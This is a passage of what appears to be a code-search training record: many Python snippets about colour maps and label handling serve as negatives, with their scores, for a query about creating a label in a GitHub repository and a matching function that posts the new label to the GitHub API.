None] * self.palette\n colors = (colors % 255).numpy().astype(\"uint8\")\n return colors", "def compute_colors_for_labels(self, labels):\n colors = labels[:, None] * self.palette\n colors = (colors % 255).numpy().astype(\"uint8\")\n return colors", "def labels(self):\r\n return labels.RepoLabels(self)", "def ColorsLabel(*args):\n return _XCAFDoc.XCAFDoc_DocumentTool_ColorsLabel(*args)", "def compute_color_for_labels(label):\n\tcolor = [int((p * (label**2 - label + 1)) % 255) for p in palette]\n\treturn tuple(color)", "def _create_color_lot(color_names, color_subnames, color_dict_rgb):\n lot = {}\n i = 0\n for sn in np.arange(len(color_subnames)):\n for n in np.arange(len(color_names)):\n lot[i] = color_dict_rgb[color_names[n]][color_subnames[sn]]\n i += 1\n\n return lot", "def _create_color_map(self):\n unique_labels = np.unique(self.out_labels)\n color_map = {}\n for unique_label in unique_labels:\n color_map[unique_label] = self._random_color()\n\n return color_map", "def _read_color_labels(filename):\n line_parser = lambda line: (int(line.split(',')[0]), line.split(',')[-1])\n with open(filename, 'r') as labels:\n label_map = dict([line_parser(line.strip()) for line in labels])\n return label_map", "def colors(self) -> dict:\n raise NotImplementedError", "def plot_colour(self, label):\n label = label.lower()\n pretty_colours = {}\n # SPIce HD\n pretty_colours['544'] = 'maroon'\n pretty_colours['545'] = 'goldenrod'\n pretty_colours['548'] = 'blueviolet'\n pretty_colours['549'] = 'forestgreen'\n # H2\n ## DOM Efficiency Sets\n pretty_colours['551'] = 'cornflowerblue'\n pretty_colours['552'] = 'cornflowerblue'\n pretty_colours['553'] = 'cornflowerblue'\n pretty_colours['554'] = 'mediumseagreen'\n pretty_colours['555'] = 'mediumseagreen'\n pretty_colours['556'] = 'mediumseagreen'\n ## Hole Ice Sets\n pretty_colours['560'] = 'olive'\n pretty_colours['561'] = 'olive'\n pretty_colours['564'] = 'darkorange'\n pretty_colours['565'] = 'darkorange'\n pretty_colours['572'] = 'teal'\n pretty_colours['573'] = 'teal'\n ## Dima Hole Ice Set without RDE\n pretty_colours['570'] = 'mediumvioletred'\n ## Baseline\n pretty_colours['585'] = 'slategrey'\n # Systematics\n pretty_colours['aeff_scale'] = 'maroon'\n pretty_colours['atm_muon_scale'] = 'goldenrod'\n pretty_colours['deltam31'] = 'blueviolet'\n pretty_colours['theta23'] = 'forestgreen'\n pretty_colours['hole_ice_fwd'] = 'mediumvioletred'\n pretty_colours['dom_eff'] = 'cornflowerblue'\n pretty_colours['genie_ma_qe'] = 'mediumseagreen'\n pretty_colours['genie_ma_res'] = 'olive'\n pretty_colours['hole_ice'] = 'darkorange'\n pretty_colours['nue_numu_ratio'] = 'teal'\n pretty_colours['theta13'] = 'fuchsia'\n pretty_colours['barr_nu_nubar'] = 'thistle'\n pretty_colours['barr_uphor'] = 'orchid'\n pretty_colours['delta_index'] = 'navy'\n # Mass ordering\n pretty_colours['no'] = 'r'\n pretty_colours['io'] = 'b'\n # Asimov fits\n pretty_colours['th_to_wh'] = 'darkviolet'\n pretty_colours['wh_to_th'] = 'deepskyblue'\n colourlabel = None\n for colourkey in pretty_colours.keys():\n if (colourkey in label) or (colourkey == label):\n colourlabel = pretty_colours[colourkey]\n if colourlabel is None:\n logging.debug(\"I do not have a colour scheme for your label %s. \"\n \"Returning black.\"%label)\n colourlabel = 'k'\n return colourlabel", "def get_value( self, trans, grid, repository ):\n repo = hg_util.get_repo_for_repository( trans.app, repository=repository, repo_path=None, create=False )\n heads = hg_util.get_repository_heads( repo )\n multiple_heads = len( heads ) > 1\n if multiple_heads:\n heads_str = '<font color=\"red\">'\n else:\n heads_str = ''\n for ctx in heads:\n heads_str += '%s<br/>' % hg_util.get_revision_label_from_ctx( ctx, include_date=True )\n heads_str.rstrip( '<br/>' )\n if multiple_heads:\n heads_str += '</font>'\n return heads_str", "def _build_label(self):\n counter = Counter()\n _, labels = self.read_json()\n counter.update(labels)\n dictionary = dict()\n for i, word in enumerate(counter.most_common()):\n dictionary[word[0]] = i\n return dictionary", "def color(self, label):\n if self.grayscale:\n return (\"#ffffff\", \"#555555\", \"#888888\", \"#bbbbbb\", \"#222222\")[label]\n # COC WL WR SL SR\n return (\"#4e73b0\", \"#fdb863\", \"#b2abd2\", \"#e66101\", \"#5e3c99\")[label]", "def create_label_colormap():\n colormap = np.array([\n [128, 64, 128],\n [244, 35, 232],\n [ 70, 70, 70],\n [102, 102, 156],\n [190, 153, 153],\n [153, 153, 153],\n [250, 170, 30],\n [220, 220, 0],\n [107, 142, 35],\n [152, 251, 152],\n [ 70, 130, 180],\n [220, 20, 60],\n [255, 0, 0],\n [ 0, 0, 142],\n [ 0, 0, 70],\n [ 0, 60, 100],\n [ 0, 80, 100],\n [ 0, 0, 230],\n [119, 11, 32],\n [ 0, 0, 0]], dtype=np.uint8)\n return colormap", "def color_label_generator(clusters):\n colors = ['green', 'red', 'blue']\n point_colors = [\"\" for i in range(12)]\n for i, cluster in enumerate(clusters):\n for point_num in cluster:\n point_colors[point_num] = colors[i]\n return point_colors", "def for_status(status):\n colors_map = {\n # ERRORS\n # 1 == red\n \"CREATE_FAILED\": crayons.red,\n \"DELETE_FAILED\": crayons.red,\n \"UPDATE_FAILED\": crayons.red,\n \"ROLLBACK_IN_PROGRESS\": crayons.red,\n \"ROLLBACK_FAILED\": crayons.red,\n \"UPDATE_ROLLBACK_FAILED\": crayons.red,\n # COMPLETE\n # 2 == green\n \"ROLLBACK_COMPLETE\": crayons.green,\n \"CREATE_COMPLETE\": crayons.green,\n \"DELETE_COMPLETE\": crayons.green,\n \"UPDATE_COMPLETE\": crayons.green,\n \"UPDATE_ROLLBACK_COMPLETE\": crayons.green,\n # SUCCESS\n # 3 == yellow\n \"CREATE_IN_PROGRESS\": crayons.yellow,\n \"DELETE_IN_PROGRESS\": crayons.yellow,\n \"UPDATE_IN_PROGRESS\": crayons.yellow,\n \"UPDATE_ROLLBACK_IN_PROGRESS\": crayons.yellow,\n \"UPDATE_COMPLETE_CLEANUP_IN_PROGRESS\": crayons.yellow,\n \"UPDATE_ROLLBACK_COMPLETE_CLEANUP_IN_PROGRESS\": crayons.yellow,\n # SKIPPED\n # 8 == grey\n \"DELETE_SKIPPED\": crayons.cyan,\n }\n return \"{}\".format(colors_map[status](status))", "def get_label_color_mapping(idx):\n # https://gist.github.com/wllhf/a4533e0adebe57e3ed06d4b50c8419ae\n def bitget(byteval, ch):\n return (byteval & (1 << ch)) != 0\n r = g = b = 0\n for j in range(8):\n r = r | (bitget(idx, 0) << 7 - j)\n g = g | (bitget(idx, 1) << 7 - j)\n b = b | (bitget(idx, 2) << 7 - j)\n idx = idx >> 3\n return np.array([r, g, b], dtype=np.uint8)", "def get_label_dict(base):\n label_dict = copy.deepcopy(labelDict)\n symbol = None\n if base.rendererType == \"gdb\":\n symbol = LabelRenderer.get_gdb_symbol(base.arcLayer)\n annotation_class_id = LabelRenderer.get_annotation_class_id(base.arcLayer)\n\n label_dict['labelValues']['type'] = 'rule-based'\n label_dict['labelValues']['classId'] = str(annotation_class_id)\n label_dict['labelValues']['text-style']['fieldName'] = 'TextString'\n elif base.rendererType == \"feature\":\n symbol = LabelRenderer.specify_feature_content(base.arcLayer, label_dict)\n\n formatted_symbol = change_interface(symbol, ArcGisModules.module_display.IFormattedTextSymbol)\n\n LabelRenderer.get_text_style(formatted_symbol, label_dict)\n LabelRenderer.get_background(formatted_symbol, label_dict)\n\n return label_dict", "def get_colors(self):\n colors = [\"#244486\", \"#A6A6A6\", \"#B12122\"]\n cmap = LinearSegmentedColormap.from_list(\"mycmap\", colors)\n\n color_palette=[cmap(i) for i in np.linspace(0, 1, len(set(self.nodes_list)))]\n return dict(zip(list(set(self.nodes_list)), color_palette))", "def getColorDict():\n scribus.statusMessage(\"Reading existing colors...\")\n colornames = scribus.getColorNames()\n scribus.progressTotal(len(colornames))\n i=0\n colordict={}\n for name in colornames:\n colordict[name]=None\n i=i+1\n scribus.progressSet(i)\n return colordict #we can ask this dict if the color already exists", "def XCAFDoc_DocumentTool_ColorsLabel(*args):\n return _XCAFDoc.XCAFDoc_DocumentTool_ColorsLabel(*args)", "def pull_labels(self, org):\n pass", "def label_rgb(colors):\n return ('rgb(%s, %s, %s)' % (colors[0], colors[1], colors[2]))", "def get_label(settings):", "def json_to_labels(data):\n labels = []\n for item in data:\n labels.append(Label(item['title'], item['color'], item['desc']))\n return labels", "def get_label(repo, title, verbose=None):\n if verbose:\n print \"Checking for label...\"\n label = None\n label_text = None\n try:\n label_start = 1 + title.index('(')\n label_end = title.index(')')\n label_text = title[label_start:label_end]\n except ValueError, e:\n print \"Warning: This tile has no embeded label. {0}\".format(e)\n if label_text:\n try:\n label = [repo.get_label(label_text)]\n if verbose:\n print \"Found label: {0}\".format(label)\n except UnknownObjectException, e:\n print \"Error: The label '{0}' does not exist on \" \\\n \"Github. {1}\".format(label_text, e)\n return label", "def prepare_label_cache(corpus):\n cache = {'Tense:{}'.format(t.pk): (t.title, t.category.color, t.category.title)\n for t in Tense.objects.select_related('category')}\n for i, label in enumerate(Label.objects.filter(key__corpora=corpus)):\n color = label.color if label.color is not None else COLOR_LIST[i % len(COLOR_LIST)]\n cache['Label:{}'.format(label.pk)] = label.title, color, None\n return cache", "def get_color(self, node: Node) -> str:\n\n idx = hash(node.get_kind_name()) % len(self.colors_)\n return self.colors_[idx]", "def get_project_labels(session=konfuzio_session()) -> List[dict]:\n url = get_project_url()\n r = retry_get(session, url)\n sorted_labels = sorted(r.json()['labels'], key=itemgetter('id'))\n return sorted_labels", "def get_labels(rf_pipeline):\n return rf_pipeline.stages[0].labels", "def get_segment_colour_map(self, features):\n\n hashList = {'1' : 'Grey',\n '2':'Red',\n '3':'Green',\n '4':'greenyellow',\n '5':'Pink',\n '6':'Orange',\n '7':'goldenrod',\n '8':'indianred',\n '9':'peachpuff',\n '10':'deepskyblue',\n '11':'firebrick',\n '12':'orchid',\n '13': 'moccasin',\n '14':'slateblue',\n '15':'turquoise',\n '16':'tomato',\n '17':'darkmagenta',\n '18':'olivedrab'}\n return hashList", "def get_pattern_labels(self, pipeline: str) -> Set[str]:", "def label_color(label):\n if label < len(colors):\n return colors[label]\n else:\n warnings.warn('Label {} has no color, returning default.'.format(label))\n return (0, 255, 0)", "def get_label_properties(identifier, seq=0, allow_empty=False):\n if not identifier:\n label = '-'\n color = '#000000'\n category = None\n elif isinstance(identifier, numbers.Number):\n tense = Tense.objects.select_related('category').get(pk=identifier)\n label = tense.title\n color = tense.category.color\n category = tense.category.title\n else:\n label = identifier\n color = '#000000' if allow_empty else get_color(identifier, seq)\n category = None\n return label, color, category", "def unique_legend_labels(key, token, board_id):\n colors = ['green', 'orange', 'purple', 'blue', 'lime', 'pink', 'sky', 'black']\n legend_id = my_get_lists(board_id, key, token)['Legend']\n members = my_get_cards(legend_id, key, token)\n members_names = list(members.keys())\n\n for i in range(len(members_names)):\n if i < len(colors):\n j = i\n add_label_to_card(key, token, members[members_names[i]], colors[j], name=members_names[i])\n elif i >= len(colors):\n j = i - len(colors)\n add_label_to_card(key, token, members[members_names[i]], colors[j], name=members_names[i])", "def _get_label_colors(n_labels, label_colors=None):\n\n if label_colors is not None:\n if len(label_colors) != n_labels:\n raise ValueError(\"There must be a color in label_colors \"\n \"for each of the labels that appear in \"\n \"sample_labels.\")\n else:\n colormap = matplotlib.cm.get_cmap()\n label_colors = colormap(np.arange(n_labels) / (n_labels - 1))\n\n return label_colors", "def colour_connected_components(labels):\n\n # Finds the HSV values based on the label number\n label_hue = np.uint8(179 * labels / np.max(labels))\n blank_ch = 255 * np.ones_like(label_hue)\n labeled_img = cv2.merge([label_hue, blank_ch, blank_ch])\n\n # Convert to BGR for display\n labeled_img = cv2.cvtColor(labeled_img, cv2.COLOR_HSV2BGR)\n\n # Set the background labels to black\n labeled_img[label_hue == 0] = 0\n\n return labeled_img", "def get_labels(self):\n labels = {}\n for i in self.binaries:\n labels[i] = self.binaries[i].label\n return labels", "def colors(self):\n return self[\"colors\"]", "def colors(self):\n return self[\"colors\"]", "def get_label_html_color_code(idx):\n color_array = get_label_color_mapping(idx)\n return f\"#{color_array[0]:02X}{color_array[1]:02X}{color_array[2]:02X}\"", "def canonical_coloring_label_1(G,c):\n \n H = G.copy()\n #H.allow_loops( true )\n\n for i in c:\n print( i )\n H.add_edges([(i,j) for j in c[i]])\n\n P = [G.vertices(), c.keys()]\n return H.canonical_label(partition=P)", "def parse_colors():\n var = os.environ.get('LS_COLORS', '')\n items = var.split(':')\n ext_map = {}\n special_map = {}\n for item in items:\n try:\n pattern, val = item.split('=')\n except ValueError:\n # TODO\n continue\n pattern = pattern.lower()\n\n if pattern.startswith('*'):\n ext_map[pattern[1:]] = val\n else:\n special_map[pattern] = val\n logger.debug(''.join(list('%s %s\\n' % (k, v) for k, v in ext_map.items())))\n return ext_map, special_map", "def get_labels(labels_name):\n labels = {\n \"labels_num\":['Blogs - Change', 'Customer Activity - Change', 'Days Since Last Login - Change', \n 'Happiness Index - Change', 'Happiness Index - Current Month', 'Happiness Index - Monthly', \n 'Logins - Change', 'Longevity - Modulo 12', 'Longevity - Modulo 18', 'Longevity - Modulo 24', \n 'Longevity - Months', 'Views - Change'],\n \"labels_cat\":['Longevity - Modulo 6', 'Support Cases - Change', 'Support Cases - Current Month', 'Support Priority - Change',\n 'Support Priority - Current Month'],\n \"target\":\"Churn\",\n \"labels_pca\":['Happiness Index - Monthly', 'Longevity - Modulo 12', 'Happiness Index - Change', \n 'Blogs - Change', 'Happiness Index - Current Month', 'Longevity - Modulo 24', \n 'Customer Activity - Change', 'Logins - Change', 'Longevity - Modulo 18', \n 'Days Since Last Login - Change']\n }\n return labels[labels_name]", "def getLabels(kmeans, options):\n colors = []\n unics=[]\n for i, c in enumerate(kmeans.centroids):\n sc=np.flip(np.argsort(c))\n color=\"\"\n if c[sc[0]]>options['single_thr']:\n color=cn.colors[sc[0]]\n else:\n colorSort=sorted([cn.colors[sc[0]], cn.colors[sc[1]]])\n color=colorSort[0]+colorSort[1]\n if color in colors:\n unics[colors.index(color)].append(i)\n else:\n colors.append(color)\n unics.append([i])\n\n return colors, unics", "def decode_segmap(label_mask, n_classes, hex_color_dict, dataset, plot=False):\r\n\r\n r = label_mask.copy()\r\n g = label_mask.copy()\r\n b = label_mask.copy()\r\n for ll in range(0, n_classes):\r\n r[label_mask == ll] = Hex_to_RGB(hex_color_dict[ll])[0]\r\n g[label_mask == ll] = Hex_to_RGB(hex_color_dict[ll])[1]\r\n b[label_mask == ll] = Hex_to_RGB(hex_color_dict[ll])[2]\r\n rgb = np.zeros((label_mask.shape[0], label_mask.shape[1], 3))\r\n rgb[:, :, 0] = r / 255.0\r\n rgb[:, :, 1] = g / 255.0\r\n rgb[:, :, 2] = b / 255.0\r\n\r\n return rgb", "def labels_to_cityscapes_palette(image):\n classes=ZHANG_classes \n result =np.zeros((img.shape[0], img.shape[1], 3),dtype=np.uint8)\n for key, value in classes.items():\n result[np.where(img == key)] = value\n return result", "def create_cityscapes_label_colormap():\r\n colormap = np.zeros((256, 3), dtype=np.uint8)\r\n colormap[0] = [128, 64, 128]\r\n colormap[1] = [244, 35, 232]\r\n colormap[2] = [70, 70, 70]\r\n colormap[3] = [102, 102, 156]\r\n colormap[4] = [190, 153, 153]\r\n colormap[5] = [153, 153, 153]\r\n colormap[6] = [250, 170, 30]\r\n colormap[7] = [220, 220, 0]\r\n colormap[8] = [107, 142, 35]\r\n colormap[9] = [152, 251, 152]\r\n colormap[10] = [70, 130, 180]\r\n colormap[11] = [220, 20, 60]\r\n colormap[12] = [255, 0, 0]\r\n colormap[13] = [0, 0, 142]\r\n colormap[14] = [0, 0, 70]\r\n colormap[15] = [0, 60, 100]\r\n colormap[16] = [0, 80, 100]\r\n colormap[17] = [0, 0, 230]\r\n colormap[18] = [119, 11, 32]\r\n return colormap", "def colors(self):\n unique, counts = np.unique(self.arr, return_counts=True)\n return {k: v for (k, v) in zip(unique, counts)}", "def labels_list(issue):\n return [x['name'] for x in issue['labels']]", "def get_labels():\n return if_found(dao.get_labels())", "def _color_for_labels(label_color, default_color, seq_index):\n if label_color is None:\n if hasattr(default_color, '__getitem__'):\n c = default_color[seq_index]\n else:\n c = default_color\n else:\n c = label_color\n\n return c or 'black'", "def get_highlighted_style(feature):\r\n\r\n return {\"weight\": 3, \"color\": \"black\"}", "def get_colors_st(top_cities_reviews):\n unique_states = top_cities_reviews['state'].unique()\n\n st = {}\n for state in unique_states:\n r = random.uniform(0, 1)\n g = random.uniform(0, 1)\n b = random.uniform(0, 1)\n st[state] = [r, g, b]\n\n return st", "def colors(lang=\"en\"):\n cache_name = \"colors.%s.json\" % lang\n data = get_cached(\"colors.json\", cache_name, params=dict(lang=lang))\n return data[\"colors\"]", "def get_labels(self):\n return set(category.label for category in\n self.get_categories(LABELS_SCHEME))", "def test_get_container_colors(self):\n colorless_containers = []\n for c in test_ps_data.ps_containers:\n c.pop('color')\n colorless_containers.append(c)\n\n color_containers = dockerprettyps.get_container_colors(colorless_containers)\n for c in color_containers:\n assert 'color' in c\n assert isinstance(c['color'], str)", "def getColor(k) :\n colors = [\"#862B59\",\"#A10000\",\"#0A6308\",\"#123677\",\"#ff8100\",\"#F28686\",\"#6adf4f\",\"#58ccdd\",\"#3a3536\",\"#00ab7c\"]\n return colors[k]", "def _labels_pcolor(self, obj, fmt=None, **kwargs):\n # Parse input args and populate _facecolors, which is initially unfilled\n # See: https://stackoverflow.com/a/20998634/4970632\n fmt = _not_none(fmt, pticker.SimpleFormatter())\n labels_kw = {'size': rc['text.labelsize'], 'ha': 'center', 'va': 'center'}\n labels_kw.update(kwargs)\n obj.update_scalarmappable() # populate _facecolors\n\n # Get positions and contour colors\n array = obj.get_array()\n paths = obj.get_paths()\n colors = _to_ndarray(obj.get_facecolors())\n edgecolors = _to_ndarray(obj.get_edgecolors())\n if len(colors) == 1: # weird flex but okay\n colors = np.repeat(colors, len(array), axis=0)\n if len(edgecolors) == 1:\n edgecolors = np.repeat(edgecolors, len(array), axis=0)\n\n # Apply colors\n labs = []\n for i, (color, path, num) in enumerate(zip(colors, paths, array)):\n if not np.isfinite(num):\n edgecolors[i, :] = 0\n continue\n bbox = path.get_extents()\n x = (bbox.xmin + bbox.xmax) / 2\n y = (bbox.ymin + bbox.ymax) / 2\n if 'color' not in kwargs:\n _, _, lum = to_xyz(color, 'hcl')\n if lum < 50:\n color = 'w'\n else:\n color = 'k'\n labels_kw['color'] = color\n lab = self.text(x, y, fmt(num), **labels_kw)\n labs.append(lab)\n obj.set_edgecolors(edgecolors)\n\n return labs", "def get_labels(self) -> Set[str]:", "def assign_colors(data: List[EmissionPerCapita]) -> dict:\r\n colors = {}\r\n for emission in data:\r\n r = random.randint(1, 255)\r\n g = random.randint(1, 255)\r\n b = random.randint(1, 255)\r\n color = \"rgb(\" + str(r) + \",\" + str(g) + \",\" + str(b) + \")\"\r\n dict.update(colors, {emission.name: color})\r\n\r\n return colors", "def preset_colors( self, labels ):\n size_labels = len( labels )\n self.color_override = self.metadata.get('color_override', {})\n try:\n if self.color_override == {}:\n raise Exception('going to the default')\n colours = self.color_override\n size_colors = len ( colours )\n retval = []\n for label in labels:\n mycolour = colours[label]\n retval.append(mycolour)\n except:\n hex_colors = self.hex_colors\n size_colors = len( hex_colors )\n retval = [ hex_colors[ i % size_colors ] for i in range( size_labels ) ]\n\n retval.reverse()\n return retval", "def getPredefinedColors(self):\n colorNames = [ 'Comment', \\\n 'Constant', \\\n 'String', \\\n 'VariableName', \\\n 'FunctionName', \\\n 'Keyword', \\\n 'Type', \\\n 'None', \\\n 'Error' \\\n ]\n colors = {}\n for colorName in colorNames:\n colors[colorName]=Color(Token(None,None,colorName),True)\n return colors", "def _generate_pipeline_labels(self, job):\n jobname = self._get_jobname(job)\n labels = {\"name\": jobname, \"app\": \"snakemake\"}\n return labels", "def extract_labels(pdbbind_label_file):\n assert os.path.isfile(pdbbind_label_file)\n labels = {}\n with open(pdbbind_label_file) as f:\n content = f.readlines()\n for line in content:\n if line[0] == \"#\":\n continue\n line = line.split()\n # lines in the label file have format\n # PDB-code Resolution Release-Year -logKd Kd reference ligand-name\n #print line[0], line[3]\n labels[line[0]] = line[3]\n return labels", "def get_labels(self, uuid=None):\n return self._get_query('labels', self._build_params(uuid=uuid), Label)", "def test_issue_get_labels(self):\n pass", "def labels(self) -> dict:\n raise NotImplementedError", "def fetch_stanford_labels():\n dipy_home = pjoin(os.path.expanduser('~'), '.dipy')\n folder = pjoin(dipy_home, 'stanford_hardi')\n baseurl = 'https://stacks.stanford.edu/file/druid:yx282xq2090/'\n\n files = {}\n files[\"aparc-reduced.nii.gz\"] = (baseurl + \"aparc-reduced.nii.gz\",\n '742de90090d06e687ce486f680f6d71a')\n files[\"label-info.txt\"] = (baseurl + \"label_info.txt\",\n '39db9f0f5e173d7a2c2e51b07d5d711b')\n fetch_data(files, folder)\n return files, folder", "def color_label(color):\n\n key_colors = {**kelvin_temperature_colors, **background_colors, **strip_colors}\n nearest_color = lambda key_colors: color_distance(color, key_colors[1])\n\n label, key_color = min(key_colors.items(), key=nearest_color)\n is_backgound_color = label in background_colors or label in kelvin_temperature_colors\n return label, not is_backgound_color", "def get_predefined_labels(self):\n raise NotImplementedError", "def ActiveRelNames(promotion_label):\n names = {}\n for platform in platforms:\n names[platform] = active_releases[platform][promotion_label]\n return names", "def read_sublette():\n readme_path = os.path.join(os.path.dirname(__file__), '../README.md')\n with open(readme_path) as f:\n readme = f.read()\n\n markdown = Markdown(extensions=['markdown.extensions.tables'])\n html = lxml.html.parse(io.StringIO(markdown.convert(readme)))\n\n colors = {}\n for td_name in html.xpath('//table/tbody//td[1]'):\n td_color = td_name.getnext()\n\n name = td_name.text_content()\n color = td_color.text_content()\n\n colors[name] = color\n return colors", "def get_labels(info):\n return info.features[\"labels\"].names", "def get_labels(info):\n return info.features[\"labels\"].names", "def get_issue_labels(repo, project, issue_number):\n issue_path = '%s/%s/issues/%d' % (repo, project, issue_number)\n\n return jsonify(dao.get_issue_labels(issue_path))", "def labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"labels\")", "def labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"labels\")", "def labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"labels\")", "def labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"labels\")", "def labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"labels\")", "def labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"labels\")", "def labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"labels\")", "def labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"labels\")" ]
[ "0.65194696", "0.5914808", "0.5822218", "0.5784747", "0.57322896", "0.5691123", "0.5686196", "0.5633396", "0.56304544", "0.56205434", "0.55804044", "0.5575821", "0.5575821", "0.5575821", "0.5575821", "0.5560394", "0.55267113", "0.55267113", "0.5519801", "0.5494467", "0.54919934", "0.5491675", "0.5484689", "0.54767305", "0.5471285", "0.54246074", "0.54210824", "0.5395026", "0.53919697", "0.5371324", "0.5329346", "0.5317548", "0.53158563", "0.5312162", "0.5304034", "0.5266262", "0.52536964", "0.5253462", "0.52400786", "0.5233174", "0.5219748", "0.5214875", "0.52140665", "0.52049685", "0.5201082", "0.51904756", "0.5181766", "0.5180814", "0.517655", "0.51689047", "0.51660675", "0.5163932", "0.5162654", "0.5154053", "0.5145553", "0.5145553", "0.5144595", "0.5131606", "0.5130216", "0.5103735", "0.50992894", "0.50740486", "0.506931", "0.50689983", "0.50666976", "0.5058705", "0.5056072", "0.505046", "0.5043439", "0.50412863", "0.50278324", "0.5023185", "0.50230396", "0.50043184", "0.4998697", "0.4986827", "0.49671224", "0.4966867", "0.49650663", "0.4964892", "0.49634117", "0.49587148", "0.49454564", "0.49285397", "0.49262607", "0.492317", "0.49047276", "0.4903492", "0.490061", "0.48983166", "0.48983166", "0.48982647", "0.48944962", "0.48944962", "0.48944962", "0.48944962", "0.48944962", "0.48944962", "0.48944962", "0.48944962" ]
0.7589527
0
Create new label in given repository
def create_label(self, repository, name, color, **kwargs): data = {'name': name, 'color': color} response = self.session.post( '{}/repos/{}/labels'.format(self.GH_API_ENDPOINT, repository), json=data ) if response.status_code != 201: raise GitHubError(response)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_label(self, org, name):\n pass", "def test_issue_create_label(self):\n pass", "async def new_label(event, gh, *args, **kwargs):\n if event.data[\"label\"][\"name\"] == TRIVIAL_LABEL:\n issue_number_found = ISSUE_RE.search(\n event.data[\"pull_request\"][\"title\"])\n if issue_number_found:\n status = create_success_status(issue_number_found)\n else:\n status = TRIVIAL_STATUS\n await _post_status(event, gh, status)", "def set_labels(repo: Repository, labels: list[Label]):\n\n log.info(f\"Fetching existing labels from {repo.full_name}\")\n existing_labels = {label.name.casefold(): label for label in repo.get_labels()}\n log.info(f\"Found {len(existing_labels)} existing labels\")\n\n for label in labels:\n qualified_name = label.qualified_name\n folded_name = qualified_name.casefold()\n if folded_name not in existing_labels:\n log.info(f\"Creating label {qualified_name}\")\n repo.create_label(**label.api_arguments)\n elif label != existing_labels[folded_name]:\n log.info(f\"Updating label {qualified_name}\")\n existing_label = existing_labels[folded_name]\n existing_label.edit(**label.api_arguments)\n else:\n log.info(f\"Label {qualified_name} already exists\")", "def test_issue_add_label(self):\n pass", "def test_heads_create_new_branch_name(repository: Repository) -> None:\n branch = repository.heads.create(\"branch\", repository.head.commit)\n assert \"branch\" == branch.name", "def new_label(self, context, payload):\n\n labels = GmailActions.labels(context)['labels']\n label_id = \"\"\n\n for label in labels:\n if label['name'] == payload['name']:\n label_id = label['id']\n break\n\n access_token = util.get_access_token(context['headers'])\n url = util.get_url(context) + f\"labels/{label_id}\"\n response = util.rest(\"GET\", url, access_token)\n\n if response.status_code > 400:\n raise Exception(\"Error \", response.text)\n\n return json.loads(response.text)", "def label(self, name):\r\n return labels.RepoLabel(self, name)", "def create_label(self, name: str):\n return create_label(self.api_key, name)", "def add_label(self, new_name, status):\n api_uri = self._uri_dict.get('addLabel')\n data = {\n 'newName': new_name,\n 'status': status\n }\n r_data = self._post(api_uri, data)\n return r_data", "def create_label(**kwargs):\n Label = Entity.Label\n kwargs[Label.project] = project\n kwargs[Label.seconds_to_label] = kwargs.get(Label.seconds_to_label.name,\n 0.0)\n data = {\n Label.attribute(attr) if isinstance(attr, str) else attr:\n value.uid if isinstance(value, DbObject) else value\n for attr, value in kwargs.items()\n }\n query_str, params = query.create(Label, data)\n query_str = query_str.replace(\n \"data: {\", \"data: {type: {connect: {name: \\\"Any\\\"}} \")\n res = project.client.execute(query_str, params)\n return Label(project.client, res[\"createLabel\"])", "def add_labels(number, labels):\n\n cmds = [github_cli, 'pr', 'edit', str(number)]\n for lab in labels:\n cmds += ['--add-label', lab]\n\n with subprocess.Popen(cmds) as p:\n _, err = p.communicate()\n print(err)", "def _apply_label(self, label):\n data = {\n \"name\" : label.title,\n \"description\" : label.desc,\n \"color\" : label.color\n }\n resp = self._post(\n self._base + \"/labels\", data=self._format_data(data))", "def label_new(request):\n if request.method == 'POST':\n form = NewLabelForm(request.POST)\n\n if form.is_valid():\n label = form.save()\n messages.success(request, 'Label successfully created.')\n return HttpResponseRedirect(reverse('label_main', args=[label.id]))\n else:\n messages.error(request, 'Please correct the errors below.')\n else:\n form = NewLabelForm()\n\n return render_to_response('annotations/label_new.html', {\n 'form': form,\n },\n context_instance=RequestContext(request)\n )", "def create_label(project_id: int, label_name: str, templates: list, session=konfuzio_session(), **kwargs) -> List[dict]:\n url = get_create_label_url()\n templates_ids = [template.id for template in templates]\n\n description = kwargs.get('description', None)\n has_multiple_top_candidates = kwargs.get('has_multiple_top_candidates', False)\n data_type = kwargs.get('data_type', 'Text')\n\n data = {\"project\": project_id,\n \"text\": label_name,\n \"description\": description,\n \"has_multiple_top_candidates\": has_multiple_top_candidates,\n \"get_data_type_display\": data_type,\n \"templates\": templates_ids\n }\n\n r = session.post(url=url, json=data)\n\n assert r.status_code == requests.codes.created, f'Status of request: {r}'\n label_id = r.json()['id']\n return label_id", "def push_to_github(label):\n\n # Make sure we're in the right place to do all the git things.\n os.chdir(taas.data_root())\n\n # If there's nothing to do, then do nothing.\n if (not something_to_commit()):\n print(\"Nothing to commit.\")\n return\n\n branch_name = datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n\n branch_name += \"-\" + label\n\n run([\"git\", \"checkout\", \"-b\", branch_name])\n\n run([\"git\", \"add\", \"-A\"])\n\n run([\"git\", \"status\"])\n\n run([\"git\", \"commit\", \"-m\", \"Automated update: \"+label])\n\n run([\"git\", \"push\", \"--set-upstream\", \"origin\", branch_name])", "def test_0010_create_repository(self):\n category = self.create_category(name=category_name, description=category_description)\n self.login(email=common.test_user_1_email, username=common.test_user_1_name)\n self.get_or_create_repository(name=repository_name,\n description=repository_description,\n long_description=repository_long_description,\n owner=common.test_user_1_name,\n category_id=self.security.encode_id(category.id),\n strings_displayed=[])", "def put_labels():\n dao.delete_all_labels()\n for label in request.json:\n if 'id' not in label or not label['id']:\n label['id'] = str(uuid.uuid4())\n dao.set_label(id=label['id'],\n name=label['name'],\n fields=label['fields'])\n return if_found(dao.get_labels())", "def addLabel(*args):", "def createLabel(self, address: ghidra.program.model.address.Address, name: unicode, namespace: ghidra.program.model.symbol.Namespace, makePrimary: bool, sourceType: ghidra.program.model.symbol.SourceType) -> ghidra.program.model.symbol.Symbol:\n ...", "def __call__(self, *args, **kwargs) -> L:\n label = self._label_adapter.create_label(*args,\n document=self._document,\n **kwargs)\n self._current_labels.append(label)\n return label", "def command_new_repo(self):\n repoinit.new_repo(*self.args())", "def post_label():\n label_id = 